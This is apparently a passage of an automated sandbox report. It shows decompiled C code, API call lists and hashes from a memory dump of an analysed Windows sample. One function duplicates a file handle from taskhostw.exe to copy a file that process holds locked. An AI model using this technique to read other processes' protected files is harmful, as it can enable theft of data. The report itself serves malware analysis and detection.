					if(_t49 != 0) {
						__eflags = _t49 - 0x20;
						if(_t49 <= 0x20) {
							goto L18;
						}
					}
					 *(_t73 - 0x4c) = 0;
					GetStartupInfoW(_t73 - 0x78);
					__eflags =  *(_t73 - 0x4c) & 0x00000001;
					if(__eflags == 0) {
						_t51 = 0xa;
					} else {
						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
					}
					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
					_t72 = _t53;
					 *(_t73 - 0x7c) = _t72;
					__eflags =  *(_t73 - 0x1c);
					if( *(_t73 - 0x1c) == 0) {
						exit(_t72); // executed
					}
					__imp___cexit();
					_t32 = _t73 - 4;
					 *_t32 =  *(_t73 - 4) | 0xffffffff;
					__eflags =  *_t32;
					_t54 = _t72;
				} else {
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					_t54 = 0xff;
				}
				return E0040E2F1(_t54);
			}

























                                                                                                                                                0x0040e0a4
                                                                                                                                                0x0040e0a4
                                                                                                                                                0x0040e0a6
                                                                                                                                                0x0040e0ab
                                                                                                                                                0x0040e0b3
                                                                                                                                                0x0040e0be
                                                                                                                                                0x0040e0df
                                                                                                                                                0x0040e0df
                                                                                                                                                0x0040e0c0
                                                                                                                                                0x0040e0c3
                                                                                                                                                0x0040e0cb
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e0cd
                                                                                                                                                0x0040e0cd
                                                                                                                                                0x0040e0d6
                                                                                                                                                0x0040e0f7
                                                                                                                                                0x0040e0fb
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e0fd
                                                                                                                                                0x0040e0fd
                                                                                                                                                0x0040e0ff
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e0ff
                                                                                                                                                0x0040e0d8
                                                                                                                                                0x0040e0dd
                                                                                                                                                0x0040e0e4
                                                                                                                                                0x0040e0eb
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e0ed
                                                                                                                                                0x0040e0ed
                                                                                                                                                0x0040e0ef
                                                                                                                                                0x0040e105
                                                                                                                                                0x0040e105
                                                                                                                                                0x0040e105
                                                                                                                                                0x0040e108
                                                                                                                                                0x0040e108
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e0dd
                                                                                                                                                0x0040e0d6
                                                                                                                                                0x0040e0cb
                                                                                                                                                0x0040e10b
                                                                                                                                                0x0040e110
                                                                                                                                                0x0040e112
                                                                                                                                                0x0040e119
                                                                                                                                                0x0040e120
                                                                                                                                                0x0040e127
                                                                                                                                                0x0040e12d
                                                                                                                                                0x0040e133
                                                                                                                                                0x0040e135
                                                                                                                                                0x0040e13b
                                                                                                                                                0x0040e141
                                                                                                                                                0x0040e14a
                                                                                                                                                0x0040e14f
                                                                                                                                                0x0040e154
                                                                                                                                                0x0040e15a
                                                                                                                                                0x0040e161
                                                                                                                                                0x0040e167
                                                                                                                                                0x0040e167
                                                                                                                                                0x0040e168
                                                                                                                                                0x0040e177
                                                                                                                                                0x0040e17c
                                                                                                                                                0x0040e181
                                                                                                                                                0x0040e196
                                                                                                                                                0x0040e19a
                                                                                                                                                0x0040e1a0
                                                                                                                                                0x0040e1a3
                                                                                                                                                0x0040e1a8
                                                                                                                                                0x0040e1ad
                                                                                                                                                0x0040e1ba
                                                                                                                                                0x0040e1be
                                                                                                                                                0x0040e1ce
                                                                                                                                                0x0040e1d1
                                                                                                                                                0x0040e1d5
                                                                                                                                                0x0040e21c
                                                                                                                                                0x0040e21c
                                                                                                                                                0x0040e220
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e222
                                                                                                                                                0x0040e224
                                                                                                                                                0x0040e224
                                                                                                                                                0x0040e1d7
                                                                                                                                                0x0040e1d7
                                                                                                                                                0x0040e1d7
                                                                                                                                                0x0040e1d9
                                                                                                                                                0x0040e1dc
                                                                                                                                                0x0040e1df
                                                                                                                                                0x0040e1e2
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e1e4
                                                                                                                                                0x0040e1e8
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e1e8
                                                                                                                                                0x0040e1ea
                                                                                                                                                0x0040e1ee
                                                                                                                                                0x0040e1f0
                                                                                                                                                0x0040e1f0
                                                                                                                                                0x0040e1f0
                                                                                                                                                0x0040e1f2
                                                                                                                                                0x0040e1f2
                                                                                                                                                0x0040e1ee
                                                                                                                                                0x0040e1f5
                                                                                                                                                0x0040e1f5
                                                                                                                                                0x0040e1f8
                                                                                                                                                0x0040e1fb
                                                                                                                                                0x0040e1fd
                                                                                                                                                0x0040e201
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040e201
                                                                                                                                                0x0040e203
                                                                                                                                                0x0040e20a
                                                                                                                                                0x0040e210
                                                                                                                                                0x0040e214
                                                                                                                                                0x0040e22b
                                                                                                                                                0x0040e216
                                                                                                                                                0x0040e216
                                                                                                                                                0x0040e216
                                                                                                                                                0x0040e237
                                                                                                                                                0x0040e23c
                                                                                                                                                0x0040e23e
                                                                                                                                                0x0040e241
                                                                                                                                                0x0040e244
                                                                                                                                                0x0040e247
                                                                                                                                                0x0040e247
                                                                                                                                                0x0040e24d
                                                                                                                                                0x0040e282
                                                                                                                                                0x0040e282
                                                                                                                                                0x0040e282
                                                                                                                                                0x0040e286
                                                                                                                                                0x0040e1c0
                                                                                                                                                0x0040e1c0
                                                                                                                                                0x0040e1c4
                                                                                                                                                0x0040e1c4
                                                                                                                                                0x0040e28d

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2827331108-0
                                                                                                                                                • Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                • Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
                                                                                                                                                • Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                • Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C5E9, Relevance: 18.1, APIs: 12, Instructions: 100fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				struct _OVERLAPPED* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t52;
				int _t55;
				int _t57;
				void* _t67;

				_t57 = 0;
				_v8 = 0;
				_v12 = 0;
				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
				if(_t38 != 0) {
					_v24 = 0;
					_v20 = 0;
					_v16 = 0x1388;
					E00406729(0x8000,  &_v24);
					_t41 = OpenProcess(0x40, 0, _v8);
					_v8 = _t41;
					if(_t41 != 0) {
						_a12 = 0;
						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
						if(_a12 != 0) {
							_a8 = GetFileSize(_a12, 0);
							_a4 = E00405351(_a16);
							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
							_v12 = _t49;
							if(_t49 != 0) {
								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
								_t67 = _t52;
								if(_t67 != 0) {
									_a16 = 0;
									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
									_t57 = _t55;
									UnmapViewOfFile(_t67);
								}
								FindCloseChangeNotification(_v12); // executed
							}
							CloseHandle(_a4);
							CloseHandle(_a12);
						}
						CloseHandle(_v8);
					}
					E00406710( &_v24);
				}
				return _t57;
			}

















                                                                                                                                                0x0040c601
                                                                                                                                                0x0040c603
                                                                                                                                                0x0040c606
                                                                                                                                                0x0040c609
                                                                                                                                                0x0040c610
                                                                                                                                                0x0040c620
                                                                                                                                                0x0040c623
                                                                                                                                                0x0040c626
                                                                                                                                                0x0040c62d
                                                                                                                                                0x0040c638
                                                                                                                                                0x0040c640
                                                                                                                                                0x0040c643
                                                                                                                                                0x0040c654
                                                                                                                                                0x0040c664
                                                                                                                                                0x0040c673
                                                                                                                                                0x0040c682
                                                                                                                                                0x0040c694
                                                                                                                                                0x0040c697
                                                                                                                                                0x0040c69f
                                                                                                                                                0x0040c6a2
                                                                                                                                                0x0040c6ac
                                                                                                                                                0x0040c6b2
                                                                                                                                                0x0040c6b6
                                                                                                                                                0x0040c6c0
                                                                                                                                                0x0040c6c7
                                                                                                                                                0x0040c6ce
                                                                                                                                                0x0040c6d0
                                                                                                                                                0x0040c6d0
                                                                                                                                                0x0040c6d9
                                                                                                                                                0x0040c6d9
                                                                                                                                                0x0040c6de
                                                                                                                                                0x0040c6e3
                                                                                                                                                0x0040c6e3
                                                                                                                                                0x0040c6e8
                                                                                                                                                0x0040c6e8
                                                                                                                                                0x0040c6ed
                                                                                                                                                0x0040c6f3
                                                                                                                                                0x0040c6f8

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
                                                                                                                                                  • Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                  • Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                  • Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                  • Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                  • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                  • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
                                                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679
                                                                                                                                                  • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3028965261-0
                                                                                                                                                • Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                • Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
                                                                                                                                                • Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                • Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401ED6, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 176COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 98%
                                                                                                                                                			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
				char _v516;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void _v546;
				char _v548;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _v576;
				int _v580;
				short _v582;
				void _v584;
				intOrPtr _v588;
				signed int _v592;
				signed int _v596;
				wchar_t* _v600;
				signed int _v604;
				intOrPtr _v624;
				char _v632;
				void* __ebx;
				void* __edi;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t97;
				signed int _t104;
				int _t124;
				intOrPtr _t126;
				signed int _t127;
				void* _t131;
				intOrPtr* _t151;
				signed int _t153;
				void* _t156;
				void* _t157;

				_t134 = __ecx;
				_v592 = __ecx;
				_v584 = 0;
				_v582 = 0;
				_v580 = 0;
				_v588 = 0x40f634;
				_t73 = memset( &_v584, 0, 0x44);
				_t126 =  *0x41235c; // 0x0
				_t151 = _a4;
				_t74 = _t73 | 0xffffffff;
				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
				_v572 = _t74;
				_v568 = _t74;
				_v564 = _t74;
				_v560 = _t74;
				_t127 = _t126 - 1;
				_v520 = 0;
				_v600 =  *((intOrPtr*)(_t151 + 0x28));
				if(_t127 < 0) {
					L3:
					_t127 = _t127 | 0xffffffff;
				} else {
					while(1) {
						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
						_pop(_t134);
						if(_t124 == 0) {
							goto L4;
						}
						_t127 = _t127 - 1;
						if(_t127 >= 0) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
				}
				L4:
				if(_t127 != 0xffffffff) {
					_t76 = _t127;
				} else {
					_t76 = E00406264(0x412340, _t134, _v600);
				}
				_v556 = _t76;
				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
				_v548 =  *_t151;
				_v544 =  *((intOrPtr*)(_t151 + 4));
				_v540 =  *((intOrPtr*)(_t151 + 8));
				_v536 =  *((intOrPtr*)(_t151 + 0xc));
				_v532 =  *((intOrPtr*)(_t151 + 0x10));
				_t129 = _v592 + 0x84c;
				_v528 =  *((intOrPtr*)(_t151 + 0x14));
				_v596 = _v592 + 0x84c;
				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0); // executed
				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
				_t131 = _v624 + 0x860;
				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
				 *((intOrPtr*)(_t131 + 4)) = 0;
				_v632 = 0;
				_v548 = 0;
				memset( &_v546, 0, 0x1fe);
				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
				_t157 = _t156 + 0x20;
				while(_t97 != 0) {
					E00406264(_t131, _t134,  &_v516);
					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
					_t157 = _t157 + 0x14;
				}
				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
				_t104 = _v596;
				_v604 = _v604 & 0x00000000;
				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
					do {
						if(_v600 != 0) {
							_t166 = _t104 | 0xffffffff;
							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
						}
						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
						_v604 = _v604 + 1;
						_t104 = _v596;
						_t134 = _v604;
					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
				}
				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
			}












































                                                                                                                                                0x00401ed6
                                                                                                                                                0x00401eef
                                                                                                                                                0x00401ef3
                                                                                                                                                0x00401ef8
                                                                                                                                                0x00401efd
                                                                                                                                                0x00401f01
                                                                                                                                                0x00401f09
                                                                                                                                                0x00401f0e
                                                                                                                                                0x00401f14
                                                                                                                                                0x00401f17
                                                                                                                                                0x00401f1a
                                                                                                                                                0x00401f1d
                                                                                                                                                0x00401f21
                                                                                                                                                0x00401f25
                                                                                                                                                0x00401f29
                                                                                                                                                0x00401f30
                                                                                                                                                0x00401f33
                                                                                                                                                0x00401f37
                                                                                                                                                0x00401f3b
                                                                                                                                                0x00401f5c
                                                                                                                                                0x00401f5c
                                                                                                                                                0x00000000
                                                                                                                                                0x00401f3d
                                                                                                                                                0x00401f4e
                                                                                                                                                0x00401f56
                                                                                                                                                0x00401f57
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401f59
                                                                                                                                                0x00401f5a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401f5a
                                                                                                                                                0x00401f3d
                                                                                                                                                0x00401f5f
                                                                                                                                                0x00401f62
                                                                                                                                                0x00401f74
                                                                                                                                                0x00401f64
                                                                                                                                                0x00401f6d
                                                                                                                                                0x00401f6d
                                                                                                                                                0x00401f7a
                                                                                                                                                0x00401f81
                                                                                                                                                0x00401f87
                                                                                                                                                0x00401f8e
                                                                                                                                                0x00401f95
                                                                                                                                                0x00401f9c
                                                                                                                                                0x00401fa9
                                                                                                                                                0x00401fb0
                                                                                                                                                0x00401fb6
                                                                                                                                                0x00401fba
                                                                                                                                                0x00401fbe
                                                                                                                                                0x00401fdb
                                                                                                                                                0x00401fdf
                                                                                                                                                0x00401fff
                                                                                                                                                0x00402007
                                                                                                                                                0x0040200f
                                                                                                                                                0x00402012
                                                                                                                                                0x00402015
                                                                                                                                                0x00402019
                                                                                                                                                0x0040201e
                                                                                                                                                0x0040203a
                                                                                                                                                0x0040203f
                                                                                                                                                0x00402070
                                                                                                                                                0x0040204b
                                                                                                                                                0x00402068
                                                                                                                                                0x0040206d
                                                                                                                                                0x0040206d
                                                                                                                                                0x00402080
                                                                                                                                                0x00402085
                                                                                                                                                0x00402089
                                                                                                                                                0x00402095
                                                                                                                                                0x00402097
                                                                                                                                                0x0040209c
                                                                                                                                                0x004020a7
                                                                                                                                                0x004020aa
                                                                                                                                                0x004020aa
                                                                                                                                                0x004020cd
                                                                                                                                                0x004020d2
                                                                                                                                                0x004020d6
                                                                                                                                                0x004020da
                                                                                                                                                0x004020de
                                                                                                                                                0x00402097
                                                                                                                                                0x004020ff
                                                                                                                                                0x0040210a
                                                                                                                                                0x00402126

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscmp
                                                                                                                                                • String ID: #A$ #A$ #A$@#A$@#A
                                                                                                                                                • API String ID: 243296809-3329557610
                                                                                                                                                • Opcode ID: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
                                                                                                                                                • Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
                                                                                                                                                • Opcode Fuzzy Hash: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
                                                                                                                                                • Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DACC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E0040DACC(wchar_t* __ebx, void* __ecx) {
				void* _v8;
				char _v72;
				void _v590;
				long _v592;
				void* __esi;
				void* _t25;
				void* _t27;
				intOrPtr _t38;

				_t27 = __ecx;
				_t26 = __ebx;
				E0040DA9D();
				_t38 =  *0x413264; // 0x76213bb0
				if(_t38 == 0) {
					_v592 = 0;
					memset( &_v590, 0, 0x206);
					_t3 =  &_v8; // 0x403a63
					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
						_t5 =  &_v8; // 0x403a63
						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72);
						RegCloseKey(_v8);
					}
					wcscpy(_t26,  &_v592);
					return 0 |  *_t26 != 0x00000000;
				}
				E004058FB();
				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
				return _t25;
			}











                                                                                                                                                0x0040dacc
                                                                                                                                                0x0040dacc
                                                                                                                                                0x0040dad6
                                                                                                                                                0x0040dadd
                                                                                                                                                0x0040dae3
                                                                                                                                                0x0040db04
                                                                                                                                                0x0040db0b
                                                                                                                                                0x0040db13
                                                                                                                                                0x0040db2f
                                                                                                                                                0x0040db36
                                                                                                                                                0x0040db44
                                                                                                                                                0x0040db4e
                                                                                                                                                0x0040db54
                                                                                                                                                0x0040db5d
                                                                                                                                                0x00000000
                                                                                                                                                0x0040db69
                                                                                                                                                0x0040dae5
                                                                                                                                                0x0040daef
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                  • Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB5D
                                                                                                                                                  • Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
                                                                                                                                                • API String ID: 2249099915-3068728944
                                                                                                                                                • Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                • Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
                                                                                                                                                • Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                • Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040BB15, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                			E0040BB15(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				struct HICON__* _t42;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t57;
				intOrPtr* _t59;
				void* _t60;

				_t59 =  *((intOrPtr*)(_t60 + 0xc));
				 *((intOrPtr*)(_t59 + 0x208)) = 0;
				 *((intOrPtr*)(_t59 + 0x244)) = 0;
				 *((intOrPtr*)(_t59 + 0x274)) = 0;
				 *((intOrPtr*)(_t59 + 0x240)) = 0;
				 *_t59 = 0x410438;
				_t35 = _t59 + 0x6ac;
				 *((intOrPtr*)(_t59 + 0x694)) = 0;
				_t50 = _t59 + 0x6c4;
				 *((intOrPtr*)(_t35 + 0xc)) = 0;
				 *_t35 = 0;
				 *((intOrPtr*)(_t35 + 4)) = 0;
				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
				 *((intOrPtr*)(_t35 + 8)) = 0;
				E0040133A(_t50);
				 *_t50 = 0x40f7b8;
				_t37 = E0040167A(_t50 + 0x40);
				 *((short*)(_t50 + 0x80)) = 0;
				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
				_push(0x2238);
				 *((intOrPtr*)(_t50 + 4)) = 0x72;
				 *((intOrPtr*)(_t50 + 0x74)) = 0;
				 *((intOrPtr*)(_t50 + 0x78)) = 0;
				L0040E038(); // executed
				if(_t37 == 0) {
					_t37 = 0;
					__eflags = 0;
				} else {
					 *((intOrPtr*)(_t37 + 0x14)) = 1;
					 *((short*)(_t37 + 0x18)) = 0;
					 *((short*)(_t37 + 0x228)) = 0;
					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
					 *0x412b14 = _t37;
				}
				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
				L0040E038();
				_t63 = _t37;
				_t48 = 0xc00;
				if(_t37 == 0) {
					_t38 = 0;
					__eflags = 0;
				} else {
					_t38 = E0040219B(_t37, _t63);
				}
				_t57 = _t59 + 0x27c;
